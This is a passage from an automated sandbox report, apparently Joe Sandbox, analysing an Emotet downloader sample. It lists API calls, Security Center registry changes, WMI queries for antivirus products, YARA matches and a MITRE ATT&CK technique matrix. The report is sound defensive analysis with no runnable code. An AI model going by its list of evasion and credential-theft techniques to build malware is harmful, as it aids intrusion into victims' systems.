          Source: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exeCode function: GetLocaleInfoA,1_2_0041C708
          Source: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,1_2_00401070
          Source: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exeCode function: lstrcpyA,LoadLibraryA,GetLocaleInfoA,1_2_00437103
          Source: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeCode function: 0_2_00418091 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_00418091
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeCode function: 0_2_0041A9AA __lock,_strlen,_strcat,_strncpy,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,_strncpy,0_2_0041A9AA
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeCode function: 0_2_0041E999 GetVersionExA,0_2_0041E999
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Lowering of HIPS / PFW / Operating System Security Settings:

          barindex
          Changes security center settings (notifications, updates, antivirus, firewall)Show sources
          Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cvalJump to behavior
          Source: svchost.exe, 0000000B.00000002.488029249.0000020F6E102000.00000004.00000001.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
          Source: svchost.exe, 0000000B.00000002.487982115.0000020F6E03D000.00000004.00000001.sdmpBinary or memory string: *@V%ProgramFiles%\Windows Defender\MsMpeng.exe
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct

          Stealing of Sensitive Information:

          barindex
          Yara detected EmotetShow sources
          Source: Yara matchFile source: 00000001.00000002.488528706.0000000000700000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.226321958.0000000002270000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.226329464.0000000002281000.00000020.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.488556425.0000000000711000.00000020.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsWindows Management Instrumentation1Path InterceptionProcess Injection2Masquerading121Input Capture1System Time Discovery2Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsNative API1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemorySecurity Software Discovery41Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion3Security Account ManagerVirtualization/Sandbox Evasion3SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection2NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol11SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsApplication Window Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonHidden Files and Directories1Cached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information2DCSyncFile and Directory Discovery2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobFile Deletion1Proc FilesystemSystem Information Discovery37Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java